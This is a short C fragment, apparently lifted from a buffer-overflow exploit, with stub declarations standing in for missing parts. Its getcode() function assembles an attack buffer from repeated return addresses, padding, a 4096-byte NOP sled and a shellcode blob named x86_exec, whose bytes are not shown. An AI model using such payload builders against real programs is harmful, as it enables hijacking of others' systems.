
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int BUFSIZE ;
 long RETADDR ;
 scalar_t__ malloc (int) ;
 int memcpy (char*,int ,int ) ;
 int memset (char*,int,int) ;
 int printe (char*,int) ;
 int strlen (int ) ;
 int x86_exec ;

char *getcode(void){
 unsigned int i=0;
 char *buf;
 if(!(buf=(char *)malloc(BUFSIZE+1)))
  printe("getcode(): allocating memory failed.",1);

 for(i=0;i<BUFSIZE;i+=4){*(long *)&buf[i]=RETADDR;}

 memset(buf,0x78,68);
 memset(buf+68,0x90,4096);
 memcpy(buf+68+4096,x86_exec,strlen(x86_exec));
 return(buf);
}
